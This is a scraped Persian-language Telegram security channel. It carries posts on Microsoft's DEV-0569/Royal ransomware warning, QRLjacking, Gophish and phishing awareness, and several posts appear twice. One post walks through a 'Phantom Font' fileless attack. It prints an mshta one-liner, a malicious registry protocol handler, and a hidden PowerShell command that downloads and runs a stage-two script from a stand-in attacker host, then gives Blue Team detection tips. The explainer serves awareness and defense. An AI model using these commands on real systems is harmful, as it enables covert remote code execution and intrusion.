🔴 هشدار جدی مایکروسافت برای انتشار باجافزار Royal و سایر بدافزارها
مایکروسافت هشدار می دهد که یک عامل تهدید که با نام DEV-0569 شناخته شده و به دلیل توزیع paylaodهای مخرب مختلف شناخته می شود، به تازگی در حال بروزرسانی روش های تحویل محتوای مخرب خود، مشاهده شده است.
گروه DEV-0569 برای توزیع بدافزار به تبلیغات مخرب (malvertising)، نظرات بلاگ، صفحات انجمن جعلی و لینکهای فیشینگ متکی بوده است.
با این حال، طی چند ماه گذشته، مایکروسافت متوجه شد که عامل تهدید شروع به استفاده از فرمهای تماس برای ارائه لینکهای فیشینگ کرده است، در حالی که این گروه، میزبان نصبکنندههای جعلی در سایتهای دانلود نرمافزار قانونی و مخازن قانونی مانند GitHub و OneDrive است.
مهاجان همچنان به تبلیغات مخرب برای توزیع بدافزار متکی هستند و حتی این تکنیک را با استفاده از Google Ads در یکی از کمپینها گسترش دادهاند.
#Cybersecurity #Cyber_Attack #Royal #Malware #DEV0569 #Batloader #Phishing #Malvertising #Google_Ad #Ransomware #GitHub #امنیت_سایبری #حمله_سایبری #بدافزار #فیشینگ #باج_افزار
کانال آموزش کامپیوتر
@Engineer_Computer
مایکروسافت هشدار می دهد که یک عامل تهدید که با نام DEV-0569 شناخته شده و به دلیل توزیع paylaodهای مخرب مختلف شناخته می شود، به تازگی در حال بروزرسانی روش های تحویل محتوای مخرب خود، مشاهده شده است.
گروه DEV-0569 برای توزیع بدافزار به تبلیغات مخرب (malvertising)، نظرات بلاگ، صفحات انجمن جعلی و لینکهای فیشینگ متکی بوده است.
با این حال، طی چند ماه گذشته، مایکروسافت متوجه شد که عامل تهدید شروع به استفاده از فرمهای تماس برای ارائه لینکهای فیشینگ کرده است، در حالی که این گروه، میزبان نصبکنندههای جعلی در سایتهای دانلود نرمافزار قانونی و مخازن قانونی مانند GitHub و OneDrive است.
مهاجان همچنان به تبلیغات مخرب برای توزیع بدافزار متکی هستند و حتی این تکنیک را با استفاده از Google Ads در یکی از کمپینها گسترش دادهاند.
#Cybersecurity #Cyber_Attack #Royal #Malware #DEV0569 #Batloader #Phishing #Malvertising #Google_Ad #Ransomware #GitHub #امنیت_سایبری #حمله_سایبری #بدافزار #فیشینگ #باج_افزار
کانال آموزش کامپیوتر
@Engineer_Computer
⭕️ به حمله ای جالب از سری حملات بر روی QRCode ها تحت عنوان QRLjacking برخورد داشتم که به روش کار آن میپردازیم.
این سری از حملات معمولا ترکیبی از مهندسی اجتماعی،فیشینگ و بعضا همراه با بدافزار خواهد بود.
به طوری که فکر کنید محل و مکان معتبری که در آن اطلاعات شخصی و مشخصات خود را ذخیره دارید و اگر براکت های QRCode دار آن محل را مهاجم دستکاری کرده و یا لینک آن را در فضای مجازی به شما ارسال کند و به لینک مقصد خود و با همان ساختار سامانه مشابه هدایت کند،
از این تکنیک حملات استفاده میکند.
البته باید گفت گاها اتفاق می افتد که برنامه های QRCode خوان خود نیز آلوده بوده و منجر به فیشینگ و یا ربایش اطلاعات خواهد شد.
https://www.hackread.com/hackers-exploit-qr-codes-qrljacking-malware/
#Phishing #Malware #RedTeam
@Engineer_Computer
این سری از حملات معمولا ترکیبی از مهندسی اجتماعی،فیشینگ و بعضا همراه با بدافزار خواهد بود.
به طوری که فکر کنید محل و مکان معتبری که در آن اطلاعات شخصی و مشخصات خود را ذخیره دارید و اگر براکت های QRCode دار آن محل را مهاجم دستکاری کرده و یا لینک آن را در فضای مجازی به شما ارسال کند و به لینک مقصد خود و با همان ساختار سامانه مشابه هدایت کند،
از این تکنیک حملات استفاده میکند.
البته باید گفت گاها اتفاق می افتد که برنامه های QRCode خوان خود نیز آلوده بوده و منجر به فیشینگ و یا ربایش اطلاعات خواهد شد.
https://www.hackread.com/hackers-exploit-qr-codes-qrljacking-malware/
#Phishing #Malware #RedTeam
@Engineer_Computer
Hackread
Hackers Exploit QR Codes with QRLJacking for Malware Distribution
Follow us on Twitter @Hackread - Facebook @ /Hackread.
👍2
Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing
ابزار Gophish مجموعهای جامع از ابزارها را در اختیار متخصصان امنیتی قرار میدهد تا کمپینهای فیشینگ خود را ایجاد کنند تا مشخص کنند کدام کارمندان به آگاهی بیشتر درباره فیشینگ نیاز دارند و آموزش را در سازمان خود بهبود میبخشند.
🔗https://getgophish.com/
#gophish #phishing
@Engineer_Computer
ابزار Gophish مجموعهای جامع از ابزارها را در اختیار متخصصان امنیتی قرار میدهد تا کمپینهای فیشینگ خود را ایجاد کنند تا مشخص کنند کدام کارمندان به آگاهی بیشتر درباره فیشینگ نیاز دارند و آموزش را در سازمان خود بهبود میبخشند.
🔗https://getgophish.com/
#gophish #phishing
@Engineer_Computer
Getgophish
Gophish - Open Source Phishing Framework
Gophish - An Open-Source Phishing Framework
#Social_Engineering #Email #Phishing
یکی از بسترهای حملات فیشینگ مبتنی بر مهندسی اجتماعی، حساب های ترجیحا تجاری ایمیل هستش، که مهاجمین همواره بد افزار یا صفحات فیشینگ را در بستر آنها پیاده سازی میکنند.
نکته ای که مهم است از منظر آگاهی امنیت سایبری، این هستش که همواره این نوع حملات با دامنه های سرویس دهنده های واسط مانند Ngrok یا IPFS صورت میگیرد، در مواردی هم دامنه ای بی سابقه از Namecheap خریداری میشود.
برای مقابله با این نوع حملات اول بررسی کنید آیا Attachment یا لینکی در ایمیل هست یا خیر، در صورت وجود Attachment حتما به فایل دست نزنید و حتی دانلود هم نکنید، و با یک کارشناس شکارچی تهدید ارتباط گرفته و موضوع را اطلاع داده تا کارشناسان فایل را در محیط Isolate و Sandbox باز کرده و مهندسی معکوس نمایند برای فرایند های جرم شناسی دیجیتال و رد یابی مهاجم.
اگر لینک در ایمیل بود بر روی لینک Mouse خود را نگهداشته تا لینک گوشه زیر برای شما نمایان شود، اگر شمایل این چنینی داشت و دامنه ای مشروع نبود، با موتور های جستجوی CTI بررسی نماید، بطور مثال این عزیزان در تصویر که برای ما تلاش میکنند.
خدا قوت هکر :)
@Engineer_Computer
یکی از بسترهای حملات فیشینگ مبتنی بر مهندسی اجتماعی، حساب های ترجیحا تجاری ایمیل هستش، که مهاجمین همواره بد افزار یا صفحات فیشینگ را در بستر آنها پیاده سازی میکنند.
نکته ای که مهم است از منظر آگاهی امنیت سایبری، این هستش که همواره این نوع حملات با دامنه های سرویس دهنده های واسط مانند Ngrok یا IPFS صورت میگیرد، در مواردی هم دامنه ای بی سابقه از Namecheap خریداری میشود.
برای مقابله با این نوع حملات اول بررسی کنید آیا Attachment یا لینکی در ایمیل هست یا خیر، در صورت وجود Attachment حتما به فایل دست نزنید و حتی دانلود هم نکنید، و با یک کارشناس شکارچی تهدید ارتباط گرفته و موضوع را اطلاع داده تا کارشناسان فایل را در محیط Isolate و Sandbox باز کرده و مهندسی معکوس نمایند برای فرایند های جرم شناسی دیجیتال و رد یابی مهاجم.
اگر لینک در ایمیل بود بر روی لینک Mouse خود را نگهداشته تا لینک گوشه زیر برای شما نمایان شود، اگر شمایل این چنینی داشت و دامنه ای مشروع نبود، با موتور های جستجوی CTI بررسی نماید، بطور مثال این عزیزان در تصویر که برای ما تلاش میکنند.
خدا قوت هکر :)
@Engineer_Computer
❤2
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد میشود!
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
چرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
🔸 هر اجرای ناگهانی mshta بدون فایل
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
C:\\Windows\\System32\\mshta.exeچرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
.reg را دانلود میکند.2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
fontview:// تعریف میکند.و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
fontview://load ریدایرکت میشود.پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید🔸 هر اجرای ناگهانی mshta بدون فایل
.hta را بررسی کنید🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏2🔥1🎉1🤩1